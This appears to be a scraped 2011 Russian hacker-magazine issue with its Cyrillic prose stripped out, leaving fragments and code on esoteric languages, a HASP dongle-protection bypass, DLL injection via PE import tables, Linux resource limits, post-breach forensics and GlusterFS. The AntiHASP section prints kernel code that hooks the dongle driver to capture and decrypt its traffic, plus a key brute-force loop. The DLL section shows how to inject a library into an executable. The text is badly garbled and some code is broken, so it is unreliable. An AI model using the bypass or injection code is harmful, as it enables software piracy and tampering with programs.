IDE brainfuck', "Brainfuck Developer"
104
,
, (, Whitespace)
. ,
. , ,

.
11 /154/ 2011
HQ9++
A B boq
(* A B *)
latlh
(* *)
cha'
(* *)
B "A" cher
(* A B *)
,
, ,
HQ9+.
, 4
, , , H, Q, 9 +.
, hello
world, , ,
. ,
. :
H Hello world.
Q .
9 99
.
+ , , ,
, .
HQ9++, HQ9+ ,
- , (David Morgan-mar). , ++,
. ,
.
, HQ9,
HQ9++ '-' . .
, ,
,
.
BEFUNG
UNLAMBDA
.
, .
-,
, .
befunge.
, ,
, . , , ,
brainfuck, ,
.
,
.
Unlambda ,
-,
. : s, k `
.
,
.
, . F (x,y),
, F(x) , .
, F(x) y ( , , ).
`, ,
.
. .
i ,
ix x.
, , ,
.
k ( ) .
s. . ```sxyz x z, y z,
.
URISC, SUBLEQ
VAR'AQ
, Star track (
Big Bang Theory. . ),
, , Varaq,
.
2000 .
, : , , .
PostScript, Lisp,
, ,
, .
, .
>v
^<
hello world:
hello world , -
Befunge-93
>
v
v ,,,,,"Hello"<
>48*,
v
v,,,,,,"World!"<
>25*,@
11 /154/ 2011
`r```````````.H.e.l.l.o. .w.o.r.l.di
105
(bepshatsky@gmail.com)
AntiHASP

HASP

.
HASP (Hardware Against Software Piracy),
Aladdin Knowledge Systems
Ltd.
.
, , HASP : . USB-, PCMCIA-, LTP-

PCI-.
, . ,

.
, -
. ,
USB- ,
.

, . hardlock.sys.
, ,
.
, \Device\
FNT0. , e
-
.
-
.
, , . ,
DRIVER_OBJECT .
. e
, .
, IRP-, . ,
, ,
! -
106
, ,
.
, .

, IRP-.
DRIVER_OBJECT. ,
IoGetDevicePointer,
. , :
NTSTATUS HookDevice(LPWSTR lpDevice)
UNICODE_STRING DeviceName;
PDEVICE_OBJECT DeviceObject;
PFILE_OBJECT FileObject;
RtlInitUnicodeString(&DeviceName, lpDevice);
IoGetDeviceObjectPointer(&DeviceName, 1u,
&FileObject, &DeviceObject);
DEVICE_OBJECT, -
11 /154/ 2011
AntiHASP
DRIVER_OBJECT.
:
NTSTATUS HookDevice(LPWSTR lpDevice)
gDriverObject = DeviceObject-> DriverObject;
gDeviceControl = gDriverObject-> MajorFunction[
IRP_MJ_DEVICE_CONTROL];
gDriverObject-> MajorFunction[IRP_MJ_DEVICE_CONTROL] =
HookDispatch;
gInternalDeviceControl = gDriverObject-> MajorFunction[
IRP_MJ_INTERNAL_DEVICE_CONTROL];
gDriverObject-> MajorFunction[
IRP_MJ_INTERNAL_DEVICE_CONTROL] = HookDispatch;
gDriverUnload = gDriverObject->DriverUnload;
gDriverObject->DriverUnload = HookUnload;
ObfDereferenceObject(FileObject);
ObfDereferenceObject,
. ,
.
e, , ,
IRP-:
void UnhookDevice(void)
gDriverObject-> MajorFunction[IRP_MJ_DEVICE_CONTROL] =
gDeviceControl;
gDriverObject-> MajorFunction[
IRP_MJ_INTERNAL_DEVICE_CONTROL] = gInternalDeviceControl;
gDriverObject->DriverUnload = gDriverUnload;
,
. . - , ,
- ,
HookUnload:
void HookUnload(PDRIVER_OBJECT DrvObj)
UnhookDevice();
gDriverUnload(DrvObj);
WDK .
DRIVER_
OBJECT, e
. ,
. e
gHookUnload.
IRP-,
. , ( \DosDevices\Hook)
CREATE, CLOSE, READ.
IoCreateDevice(DriverObject, 0, &usDeviceName,
FILE_DEVICE_NULL, 0, 0, &pDeviceObject);
IoCreateSymbolicLink(&usSymbolicDeviceName, &usDeviceName);
DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispatch;
DriverObject->MajorFunction[IRP_MJ_READ] = DriverDispatch;
DriverObject->DriverUnload = DriverUnload;
,
, CreateFile\ReadFile\CloseHandle.
,

. ,
. ,
. (, ,
) , , . .
,
. e, ,
-, .
HookDispatch
if (idlTail->IrpData.InputLength) {
idlTail->InputBuffer = ExAllocatePool(NonPagedPool,
idlTail->IrpData.InputLength);
RtlCopyMemory(idlTail->InputBuffer,
Irp->AssociatedIrp.SystemBuffer,
idlTail->IrpData.InputLength);
}
11 /154/ 2011
107

if (IoSL->MajorFunction == IRP_MJ_DEVICE_CONTROL)
Status = pHookedDriverDispatch[IRP_MJ_DEVICE_CONTROL](
DeviceObject, Irp);
if (idlTail->IrpData.OutputLength) {
idlTail->OutputBuffer = ExAllocatePool(NonPagedPool,
idlTail-> IrpData.OutputLength);
RtlCopyMemory(idlTail->OutputBuffer, lpBuffer,
idlTail->IrpData.OutputLength);
}
. , ,
.
:
; ,
:
DriverDispatch
Length = IoSL->Parameters.Read.Length;
if (Length == sizeof(IRP_DATA) && idlHead)
RtlCopyMemory(Irp->UserBuffer, &idlHead->IrpData, Length);
else
if (idlHead && Length == (idlHead-> IrpData.InputLength +
idlHead-> IrpData.OutputLength))
{
RtlCopyMemory(Irp->UserBuffer, idlHead-> InputBuffer,
idlHead->IrpData.InputLength);
RtlCopyMemory((PVOID)((ULONG)Irp->UserBuffer +
idlHead->IrpData.InputLength),
idlHead-> OutputBuffer, idlHead->IrpData.OutputLength);
}
else if (Length == 1 && idlHead)
{
if (idlHead->InputBuffer)
ExFreePool(idlHead->InputBuffer);
if (idlHead->OutputBuffer)
ExFreePool(idlHead->OutputBuffer);
108
idlTemp = idlHead->ldlNext;
ExFreePool(idlHead);
idlHead = idlTemp;
if (!idlTemp)
idlTail = NULL;
}
, ,
e .
, . , (9c402450, 9c4024a0) . ,
, , , ,
, .
:
;
.
. , ,
AES (Advanced Encryption Standard).
.
e
, ,
,
.
, , . :
unsigned short Key;
unsigned char RefKey[8], VerKey[8];
for (Key = 0; Key <= 0x7fff, Key++) {
if (!HL_LOGIN(Key, 1, RefKey, VerKey)) {
HL_LOGOUT();
Break;
}
}
11 /154/ 2011
AntiHASP
return Key;
for (int i = 0xBE; i < 0xFF; i++) {

*(WORD*)(Buffer + i) -= Seed;
Seed = (Seed >> 15) | (Seed << 1);
Seed += *(WORD*)(Buffer + i) ^ i;
}
(MODAD) : , , . ,
e . HL_LOGIN, HL_LOGOUT
HASP SDK , e
, :
*((WORD*)Buffer + 0xba) = Seed;

}
WORD HL_LOGIN(WORD ModAd, Word Access,

Byte *RefKey, Byt *VerKey);
WORD HL_LOGOUT(void);

, . HASP SDK,
, .
API , . Hasp
API,
.
}
, , . :
Decrypt()
void Decrypt(BYTE* Buffer)
{
WORD Seed = *((WORD*)Buffer + 0x5e);
WORD Ver = *((WORD*)Buffer + 0xba);
if (Ver) {
for (int i = 0xFE; i > 0xBD; i--) {
Seed -= *(WORD*)(Buffer + i) ^ i;
Seed = (Seed << 15) | (Seed >> 1);
*(WORD*)(Buffer + i) += Seed;
}
. . e
IRP-. .
,
. , , /
.
:
NTSTATUS HookDispatch():
PIO_STACK_LOCATION Stack =
Irp-> Tail.Overlay.CurrentStackLocation;
ULONG IoControlCode;
if (Stack->MajorFunction == 14) {
IoControlCode = Stack.DeviceIoControl.IoControlCode;
if (IoControlCode != 0x9c402458) {
Return gDeviceControl(DeviceObject, Irp);
} else {
Encrypt(Irp->AssociatedIrp.SystemBuffer);
Crypt(Irp->AssociatedIrp.SystemBuffer, Key, DumpMemory);
}
}
return STATUS_FAILED;
, ,
. :
?
, :
Encrypt()
void Encrypt(BYTE * Buffer)
{
WORD Seed = *((WORD*)Buffer + 0x5e);
WORD Ver = *((WORD*)Buffer + 0xba);
if (Ver) {
for (int i = 0; i < 0xB9; i++) {
*(WORD*)(Buffer + i) += Seed;
Seed = (Seed >> 15) | (Seed << 1);
Seed -= *(WORD*)(Buffer + i) ^ i;
}
for (int i = 0xB8; i >= 0; i--) {

Seed += *(WORD*)(Buffer + i) ^ i;
Seed = (Seed << 15) | (Seed >> 1);
*(WORD*)(Buffer + i) -= Seed;
}
*((WORD*)Buffer + 0xba) = Seed;
}
}
e ,
.
, . ,
, .
, .
, ,
DeviceIoControl, .
: USB-.
. , .
,
IRP-.
. ! z
Hardlock.sys
\Device\FNTO
DeviceControl
InternalDeviceControl
DriverUnload

Antihasp.sys
HookDispatch
HookUnload
11 /154/ 2011
109
deeonis (deeonis@gmail.com)
DLL
DLL

, ,
, Windows
EXE DLL. , ,
. ,
,
. dynamic-link library, ,
.
DLL kernel32.dll user32.dll, .
, ,
.
.
,

exe- ,
.

Windows

.

,

.
110
WWW

PortableExecutables (PE):
emanual.ru/download/www.eManual.
ru_1298.html;

:
rsdn.ru/article/baseserv/peloader.xml.
INFO
Hiew must
have ,
PE: hiew.ru;
PETools

: petools.
org.ru/petools.shtml.

- DLL, .
: . , . .
API-,
LoadLibrary GetProcAddress. ,
, .
.
PE- (
, exe)
DLL, .
,

11 /154/ 2011
DLL-
notepad.exe PETools
. ,
DLL .
Windows
:
, .
, DLL
,
. ,
PE- , .
PE-
Windows DOS Header.
e_magic 00h
5A4Dh (IMAGE_DOS_SIGNATURE) ,
, MZ. e_lfanew
IMAGE_DOS_HEADER PE . , ,
winnt.h IMAGE_NT_HEADERS.
DWORD Signature,
4550h , , PE. ,

MZ PE, ,
PE-.
// , PE-
else
// Oops!!!
}
.
IMAGE_OPTIONAL_HEADER,
IMAGE_NT_HEADERS. IMAGE_OPTIONAL_HEADER
IMAGE_DATA_DIRECTORY.
- .

IMAGE_DIRECTORY_ENTRY_IMPORT 1.
IMAGE_DATA_DIRECTORY :
IMAGE_DATA_DIRECTORY
typedef struct _IMAGE_DATA_DIRECTORY {
DWORD VirtualAddress;
DWORD Size;
PE-
BYTE *buff = new BYTE[file_size];
// PE- buff...
if ((PIMAGE_DOS_HEADER)buff)->e_magic == IMAGE_DOS_SIGNATURE)
{
PIMAGE_NT_HEADERS nth = (PIMAGE_NT_HEADERS)((DWORD)
((PIMAGE_DOS_HEADER)buff)->e_lfanew) + (DWORD)buff);
if (nth->Signature == IMAGE_NT_SIGNATURE)
11 /154/ 2011
Hiew
111
typedef struct _IMAGE_DOS_HEADER

{
WORD e_magic;
WORD e_cblp;
WORD e_cp;
WORD e_crlc;
WORD e_cparhdr;
WORD e_minalloc;
WORD e_maxalloc;
WORD e_ss;
WORD e_sp;
WORD e_csum;
WORD e_ip;
WORD e_cs;
WORD e_lfarlc;
WORD e_ovno;
WORD e_res[4];
WORD e_oemid;
WORD e_oeminfo;
WORD e_res2[10];
LONG e_lfanew;
} *PIMAGE_DOS_HEADER;
typedef struct _IMAGE_OPTIONAL_HEADER

{
WORD Magic;
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint;
DWORD BaseOfCode;
DWORD BaseOfData;
DWORD ImageBase;
DWORD SectionAlignment;
DWORD FileAlignment;
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage;
DWORD SizeOfHeaders;
DWORD CheckSum;
WORD Subsystem;
WORD DllCharacteristics;
DWORD SizeOfStackReserve;
DWORD SizeOfStackCommit;
DWORD SizeOfHeapReserve;
DWORD SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[16];
} IMAGE_OPTIONAL_HEADER;
typedef struct _IMAGE_NT_HEADERS

{
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} *PIMAGE_NT_HEADERS32;
typedef struct _IMAGE_IMPORT_DESCRIPTOR {

union {
DWORD
Characteristics;
DWORD
OriginalFirstThunk;
};
DWORD
TimeDateStamp;
DWORD
ForwarderChain;
DWORD
Name;
DWORD
FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
typedef struct _IMAGE_IMPORT_BY_NAME {

WORD
Hint;
BYTE
Name[1];
// , ,
// ASCIZ-
} IMAGE_IMPORT_BY_NAME;
typedef struct _IMAGE_DATA_DIRECTORY

{
DWORD VirtualAddress;
DWORD Size;
} IMAGE_DATA_DIRECTORY;
typedef struct _IMAGE_THUNK_DATA {

union {
DWORD ForwarderString; // PBYTE
DWORD Function;
// PDWORD
DWORD Ordinal;
DWORD AddressOfData;
// PIMAGE_IMPORT_BY_NAME
} u1;
} IMAGE_THUNK_DATA;
} IMAGE_DATA_DIRECTORY,
*PIMAGE_DATA_DIRECTORY;
VirtualAddress RVA (relative virtual
address), ,
ImageBase. RVA 1000h, ImageBase
00400000h,
00401000h.
, . ,
,
PE-
.
(, -,
RAW offset). ,
PE- Import table, RVA RVA
PointerToRawData .
() PE
Header, NumberOfSections IMAGE_FILE_HEADER. , ,
.
// RVA
DWORD impRVA = nth->OptionalHeader.DataDirectory[
IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
//
PIMAGE_SECTION_HEADER inFileSec =
IMAGE_FIRST_SECTION(nth);
// ,
WORD impSecIndex = -1;
for (size_t i = 0; i < nos-1; i++)
{
if (impRVA >= inFileSec[i].VirtualAddress &&
impRVA < inFileSec[i+1].VirtualAddress)
{
impSecIndex = i;
break;
}
}
//
DWORD impRawOffset = inFileSec[impSecIndex].
PointerToRawData + impRVA;

RAW Offset Import Table
// buff PE-...
PIMAGE_NT_HEADERS nth = (PIMAGE_NT_HEADERS)((DWORD)
((PIMAGE_DOS_HEADER)buff)->e_lfanew) + (DWORD)buff);
// -
WORD nos = nth->FileHeader.NumberOfSections;
112
,
DLL.
Import Table. , , .
IMAGE_IMPORT_DESCRIPTOR.
IMAGE_IMPORT_
DESCRIPTOR. ,
.
11 /154/ 2011
DLL-
IMAGE_IMPORT_DESCRIPTOR
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
};
DWORD TimeDateStamp;
DWORD ForwarderChain;
DWORD Name;
DWORD FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
: Name, OriginalFirstThunk FirstThunk.
Name RVA DLL. (0x00),
. , kernel32.dll,

13, 2.
.
OriginalFirstThunk RVA IMAGE_THUNK_DATA,
.
IMAGE_THUNK_DATA , RVA IMAGE_IMPORT_BY_NAME.
Hint 2 ,
DLL,
,
.
FirstThunk OriginalFirstThunk,
RVA IMAGE_THUNK_DATA, OriginalFirstThunk,
PE-
. .
, , PE, DLL.

IMAGE_IMPORT_DESCRIPTOR.
IMAGE_IMPORT_DESCRIPTOR
// IMAGE_IMPORT_DESCRIPTOR
PIMAGE_IMPORT_DESCRIPTOR iid = (PIMAGE_IMPORT_DESCRIPTOR)

(impRawOffset + (DWORD)buff);
//
while (iid->Name != 0) iid++;
// IMAGE_IMPORT_DESCRIPTOR
fillIID(iid);
//
iid++;
ZeroMemory(iid, sizeof(IMAGE_IMPORT_DESCRIPTOR));
. -,
sizeof(IMAGE_IMPORT_
DESCRIPTOR). , ,
, OriginalFirstThunk. -, IMAGE_IMPORT_DESCRIPTOR,
OriginalFirstThunk FirstThunk,
RVA Name.
PE-, - .

(, IMAGE_IMPORT_DESCRIPTOR),
- . PE-
- , , .
OriginalFirstThunk FirstThunk,
DLL Name, IMAGE_IMPORT_
11 /154/ 2011
BY_NAME
.
DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]
DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].
PE-
.
, ,
, .
RVA ,
,
.
, , .
,
,
. ,
. , ,
, PE-.
DLL

Windows ,
, DLL.
.
DllMain
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
::MessageBox(NULL, "",
" DLL", MB_OK);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
ul_reason_for_call ,
DllMain. , exe-, ul_reason_for_call DLL_PROCESS_ATTACH. ,
, ,
DLL.
DllMain,
. ,
DLL - . ,
DLL , .

, , .
, DLL ,
Windows.
( ,
, DllMain).
API . , , ,
- DLL .

PE-,
,
. z
113
UNIXOID
(execbit.ru)
LINUX

Linux

.
, ,
,
SELinux AppArmor.
?
,
30%
, 5% ,
128
-?
.
114
INFO
WARNING
nice
ionice
,

:
nice -n 19 ionice -c2
-n7 .
cpulimit

,

,
200%.
. ,
( Adobe).
,
10%
. ,
, ,
- .
wget -,
- . -
, .
,
cgroups, Linux.

, .
, -20
19.
, ,
() .
, , mencoder
:
$ nice -n 19 mencoder -ovc lavc -lavcopts \
vcodec=mpeg in-video.avi -o out-video.avi
. mencoder
,
. , ,
,
.
, (, ), (,
, ,
).
, cpulimit.
cpulimit ,
,
(
SIGSTOP).

11 /154/ 2011
SIGCONT,
.
cpulimit Linux, FreeBSD POSIX .
: sudo apt-get install cpulimit. cpulimit, : cpulimit --exe --limit _
. :
cpulimit --pid 2960 --limit 55.
. cpulimit . abcuser ubuntuforums.
org ,

, . ,
(cpulimit_daemon.sh). /usr/local/bin :
# vi /usr/local/bin/cpulimit_daemon.sh
#
CPU_LIMIT=20
#
DAEMON_INTERVAL=3
#
# ,
BLACK_PROCESSES_LIST=npviewer.bin
#
WHITE_PROCESSES_LIST=
/mnt/cgroups

npviewer.bin, ( Flash- Adobe, ). .
:
$ sudo chmod 700 /usr/bin/cpulimit_daemon.sh
cpulimit, /etc/
init.d :
$ sudo chown root:root /etc/init.d/cpulimit
$ sudo chmod 755 /etc/init.d/cpulimit
:
$ sudo /etc/init.d/cpulimit start
$ sudo update-rc.d cpulimit defaults

.

.
POSIX-
ulimit, ,
( setrlimit).
,
, , :
$ ulimit -m
unlimited
,
. ,
100 (100 * 1024 = 100 ):
$ ulimit -m $((100*1024))
11 /154/ 2011
cgroups
: ,
( ),
,
. ,

. , :
#!/bin/sh
ulimit -m $1
$2
~/bin/mlimit
, : mlimit $((50*1024))
xterm.
softlimit
(goo.gl/Qrc7k).
115
UNIXOID
$ sudo ionice -c2 -n7 transmission

200 ,

- -.
ionice. , Idle 1234:
/etc/rc.local :
$ sudo ionice -c3 -p 1234
mount -t cgroup cgroup /sys/fs/cgroup/cpu -o cpu

mkdir -m 0777 /sys/fs/cgroup/cpu/user
,
. ,
.

. ,
.
,
. ,
transmission 100 , :
1. (
quota_100gb):
:
$ sudo sh /etc/rc.local
~/.config/autostart/cgroup.sh
:
mkdir -m 0700 /sys/fs/cgroup/cpu/user/$$
echo $$ > /sys/fs/cgroup/cpu/user/$$/tasks
.
$ sudo adduser quota_100gb

. ,
: )
-, ,
; ) ,
, ,
.
ionice. io, , -,
. ionice
:
1. Idle. , -, ,
, .
, , ,
.
0.
2. Best effort. ,
. -
,
, 0 7 (0
, 7 ). , nice, ,
nice -n 19 bla-bla-bla,
.
3. Real time. ,
.
(0-7) ,
-. , .
: 1 real
time, 2 best-effort, 3 idle. -,
ionice,
. :
116
, -
cgroups Fedora
11 /154/ 2011
, npviewer.bin Flash-
. .
2. 100 :
, trickle-.
, :
$ trickled -d 128 -u 128
$ sudo apt-get install quota

$ su
# init 1
/etc/fstab, ,
/home, usrquota:
/dev/sda7 /home ext4 defaults,usrquota 0 1
/home
:
# mount -o remount /home
# quotacheck -cugm /home
, quota_100gb:
# EDITOR=_ edquota -u quota_100gb
,
/etc/fstab. hard ,
, ( 100 ): echo
$((100*1024*1024)).
, :
# init 5
# exit
3. :
:
$ trickle wget ftp://kernel.org/bla-bla-bla
$ trickle transmission
$ trickle chromium
128 /.
, , , . Linux,
- , cgroups.
Control Groups Linux-, ,

.
,
- .
cgroups , ,
cgconfig, /etc/cgconfig.conf , cgcreate, ,
cgexec,
.
cgroup-bin, .
cgroup
, /
mnt/cgroups:
$ sudo -u quota_100gb transmission

trickle, ,
cpulimit,
(
socket).
,
:
$ sudo apt-get install trickle
:
$ trickle -d 128 -u 128 \
wget ftp://kernel.org/bla-bla-bla
'-d' , '-u'
( ).
-
11 /154/ 2011
$ sudo mkdir /mnt/cgroups

$ sudo mount -t cgroup none /mnt/cgroups

,
. :
cgroups
blkio -;
cpu ;
cpuacct ;
cpuset ;
;
devices ;
freezer ;
memory ;
net_cls
(classid)

Traffic Control (tc);
117
UNIXOID
ns .
: blkio, cpu memory.
net_cls , -
tc, ,
trickle.
, , /etc/
cgcondig.conf :
$ sudo vi /etc/cgconfig.conf
mount {
cpu = /mnt/cgroups/cpu;
memory = /mnt/cgroups/memory;
blkio = /mnt/cgroups/blkio;
}
transmission, :
$ cgexec -g blkio:me/transmission transmission
Flash-,
:
$ cgcreate -g cpu,memory:me/npviewer
100 10% ( 1
1024) :
$ echo 100 > /mnt/cgroups/cpu/me/npviewer/cpu.shares
$ echo 100M > \
/mnt/cgroups/memory/me/npviewer/memory.limit_in_bytes
:
cgconfig:
$ sudo /etc/init.d/cgconfig
, /mnt/cgroups/cpu, /mnt/cgroups/memory
/mnt/cgroups/blkio , .
,
root.
cgcreate:
$ sudo cgcreate -a $USER -g cpu,memory,blkio:me
me cpu, memory
blkio, .
,
. , ,
transmission, :
$ cgcreate -g blkio:me/transmission
( ) -
( 100 1000):
$ echo 100 > /mnt/cgroups/blkio/me/transmission/bklio.weight
$ cgclassify -g memory,cpu:me/npviewer \
`pidof npviewer.bin`
,
/etc/cgconfig.config:
# vi /etc/cgconfig.conf
#
group me {
perm {
# ?
admin {
uid = UID_
}
# ?
task {
uid = UID_
}
}
# ?
cpu { }
memory { }
blkio { }
}
group me/npviewer {
cpu {
cpu.shares = 100;
}
memory {
memory.limit_in_bytes = 100M;
}
}
group me/transmission {
blkio {
blkio.weight = 100;
}
}
, .
,
. , ,
wget.
. z
ulimit
118
11 /154/ 2011
UNIXOID
(execbit.ru)

HOW TO ,

. -
: ,
,
.
,
, .
,

,
, ?

?
11 /154/ 2011
INFO

btrfs
,

ext4,

WARNING
root SSH

FTP

*nix-.

, ,
( , , ), - ,
. ,
, iptraf/gkrellm
, - IP, 33477 SSH.
,
, . , . ?
(
, WiFi). , ,
ifconfig eth0 down, ,
. ,

. -,
, -, , ,
.
. , -
119
UNIXOID

, , , (
), , ,
:
/var/log/auth.log SSH
#
#
#
#
#
#
#
D=/media/usbflash
busybox ps > $D/ps.txt
busybox netstat -tuw > $D/conn.txt
busybox netstat -tuwl | grep LISTEN > $D/listen.txt
busybox who > $D/users.txt
busybox lsmod > $D/modules.txt
busybox mount > $D/mount.txt
,
. ps.txt
.
, .
- -
,
nc telnet.
, ,
cups,
. ,
( root),
:
# busybox find / -user
Linux-
: ls
, , ps , lsmod . , , .
busybox,
( , ,
), :
# dpkg -i busybox-*
:
# wget http://goo.gl/TuWTE
# tar -xjf busybox-1.19.1.tar.bz2
# cd busybox-1.19.1
# make menuconfig
//
# make
# make install
busybox
/bin/busybox (
, ,
). busybox , 100%: ,
wget, cp, ,
. .
120

. ,
,
, ,
. ,
.
conn.txt .
IP-
. ,
, , . ,
,
IP- ??. listen.txt
. , , , (,
80, web- ).
users.txt .
: ,
.
modules.txt , , , , .
mount.txt ,
, .
,
- LiveCD
( ,
reboot , / ).
?
LiveCD :
1. (
mount.txt):
# e2fsck /dev/sda{1,2,3,4}
11 /154/ 2011
SSHERIFF
/etc/passwd (, /mnt/etc/passwd)
UID:
# busybox cat /etc/passwd | grep '.*:.*:0:'
root- :
# vi /etc/ssh/sshd_config
PermitRootLogin no
Match Host 192.168.1.*,127.0.0.1
PermitRootLogin yes
2. /mnt (
mount.txt):
# mount /dev/sdaX /mnt
, , .
( )
. , ,
, ~/.ssh/authorized_keys
- .
( , , ).

:
1. UID- , find:
3. mount.txt.
# busybox find / $ -perm -02000 -o -perm -04000 $
4. /mnt/bin busybox LiveCD (, , ):

# cp /bin/busybox /mnt/bin/busybox
2.
5. /mnt
chroot:
# chroot /mnt /bin/bash
3.
, busybox . , - .
? -, /root,
, /tmp, /var/tmp /dev/shm .
,
'c' .
, , , , .
, , ______,
.
.bash_history
, ,
, (
, ).
4.
5.
, , SUID-,
. , chroot-,
LiveCD .
xinetd,
.
/etc/xinetd.d, /etc/inetd.
conf. ,
. ,
.
PAM. , .
/etc/pam.d,
,
. Google
. ,
.

cron. , , ,
2 . 99%
, , netstat
nmap, .
/etc/cron.*, /var/spool/cron/crontabs,
.
CGI-. , , web- .
,
, .
, web-, ( , ,
, root).
, ,
.

.
, :
-
11 /154/ 2011
# chattr -iacsuASDd {/,/usr,/usr/local}{/bin/,/sbin/}*
121
UNIXOID
vsftpd , ,
. 99%
, .
. rkhunter ,
,
, ,

.
, (
LiveCD, ):
# apt-get install rkhunter
:
# /usr/bin/rkhunter -update
# /usr/bin/rkhunter -check
, ,
/bin ,
. rkhunter
, .
, rkhunter .

, , rkhunter , .
. , , ,
. ,
Fedora/RHEL, :
# rpm -Va
Debian/Ubuntu .
debsums:
# sudo apt-get install debsums
:
# /usr/bin/debsums -ca
, , , .
lastlog last
lastlog , IP
subsystem request for sftp by user root

reverse mapping checking getaddrinfo for X.X.X.X
[X.X.X.X] failed POSSIBLE BREAK-IN ATTEMPT!
99 ,
, ,
:
Failed password for root from X.X.X.X port 3473 ssh2
IP-
, ,
, ,
SSH.
lastlog,
IP. :
?
, .
.
,
. ?

: apache, vsftpd, samba ..
,
SSH, .
SSH- () /var/log/
auth.log (, PAM). SSH,
, .
:
Accepted password for root from X.X.X.X port 63241 ssh2
pam_unix_session(sshd:session): session opened for user
root by (uid=0)
122
root pts/3 X.X.X.X Thu Jul 21 21:39:41 +0600 2011

last.
, IP- , whois, -.

( )
:).
,
, , (

-).
, ,
, , (/var/
log/auditd.log).
11 /154/ 2011
USER_PROCESS
SYS_CALL_TABLE
SYS_LIB
syscall1
c0120020
syscall2
c0120031
syscall3
c0120042
...
text segment
...
KERNEL
...
, ,

?
, , ,
. ,
, ?
: .
,
, ,
- , .
.
-
, .
.
, , Debian/Ubuntu
:
# dpkg-reconfigure -phigh -a
, ,
. ,
evil_func3()
alter_syscall2
evil_func2()
alter_syscall1
evil_func1()
data segment
USER MODE
alter_syscall3
KERNEL MODE
ARDWARE
ARDWARE
, . -
: -,
, -, (
, ).
, . , ,
cruft-remover ( Debian/Ubuntu):
# apt-get install cruft
// ,
# cruft-remover --no-act find
//
# cruft-remover cleanup --all
rkhunter
:
# rkhunter --propupd
rkhunter cron-,
. , /etc/rkhunter.conf :
MAIL-ON-WARNING="root"
,
. , :
1. .
2. SSH.
3. .
rkhunter
11 /154/ 2011

. z
123
SYN/ACK
(execbit.ru)

GLUSTERFS

,

lustre,

.
lustre
.

GlusterFS.
124
WWW

:
http://bit.ly/nV9no8
usterFS .

, ,
.
lustre ceph, ,
, , ,
. GlusterFS
, , ,
FUSE (Linux, FreeBSD, NetBSD, MacOS X).
, :
, 0(1) ( ).
TCP/IP Infiniband RDMA
TCP/IP.
.
.
, .
: -, MySQL,
LDAP.
11 /154/ 2011
trace
-.
io-stats -.

server client,
.
GlusterFS (http://europe.gluster.org/community/
documentation/index.php/Translators). CloudFS/HekaFS
(http://cloudfs.org).
Glusterfs
GlusterFS
FUSE. ,
Linux-
,
. , Ubuntu
:
1. , GlusterFS- :
$ sudo apt-get install openssh-server wget nfs-common
BerkeleyDB .
Read-Ahead ( ) WriteBehind ( ) .
.
.
,
.
.
NFS-, GlusterFS.

GlusterFS, ,
, GlusterFS GNU/Hard ( GEOM
FreeBSD).
, . ,
, . ,
,
.
, .
:
posix UNIX,
( ).
replicate .
readahead .
writebehind
.
io-threads /.
io-cache .
stat-prefetch ( ,
).
quota
.
trash .
11 /154/ 2011
2. GlusterFS ( , ):
$ wget http://download.gluster.com/pub/gluster/
glusterfs/LATEST/Ubuntu/glusterfs_3.2.2-1_amd64.deb
$ sudo dpkg -i glusterfs*.deb
3. , . GlusterFS 24007, 24008,
brick
( ), , (
, GlusterFS

). NFS , 111. ,
iptables:
$ iptables -A INPUT -m state --state NEW -m tcp -p tcp \
--dport 24007:24047 -j ACCEPT
$ iptables -A INPUT -m state --state NEW -m tcp -p tcp \
--dport 111 -j ACCEPT
$ iptables -A INPUT -m state --state NEW -m udp -p udp \
--dport 111 -j ACCEPT
$ service iptables save
$ service iptables restart
GlusterFS-.
- . , x86_64,
8 1
.
10-
ethernet-, InfiniBand (OFED 1.5 ). RHEL 5.1,
Ubuntu Fedora, FUSE.
,
Ext4, Ext3, XFS.
, ,
POSIX- .
125
SYN/ACK
GlusterFS

, GlusterFS , .
. , ,

.
gluster peer probe IP. , () root
. :
$ ssh root@192.168.0.1
# gluster peer probe 192.168.0.2
Probe successful
192.168.0.1 192.168.0.2 ,
,
.
,
, /
.
( ):
,
( ):
# mkdir /data
gluster peer status :
# gluster peer status
Number of Peers: 3
Hostname: 192.168.0.2
Uuid: 5e987bda-16dd-43c2-835b-08b7d55e94e5
126
State: Peer in Cluster (Connected)

Hostname: 192.168.0.3
Uuid: 1e0ca3aa-9ef7-4f66-8f15-cbc348f29ff7
State: Pfde43e-4533-4e33-4f77-ed3984da21ae
Hostname: 192.168.0.4
Uuid: 3e0cabaa-9df7-4f66-8e5d-cbc348f29ff7
State: Pfde43e-4533-4e33-4f77-ed3984da21ae
,
, , . GlusterFS (3.2.1)
3 ,
:
Distributed , ,
.. ,
,
,
, , RAID-1
.
. ,
:
# gluster volume create new_volume transport tcp
192.168.0.1:/data 192.168.0.2:/data 192.168.0.3:/data
192.168.0.4:/data
Volume Name: new_volume
Type: Distribute
Status: Created
Number of Bricks: 4
Transport-type: tcp
Bricks:
Brick1: 192.168.0.1:/data
Brick2: 192.168.0.2:/data
11 /154/ 2011
, . , , :
,
.. .
Distributed Replicated RAID10:
# gluster volume create new_volume replica 2 transport
tcp 192.168.0.1:/data 192.168.0.2:/data 192.168.0.3:/data
192.168.0.4:/data
( , )
. , ( )
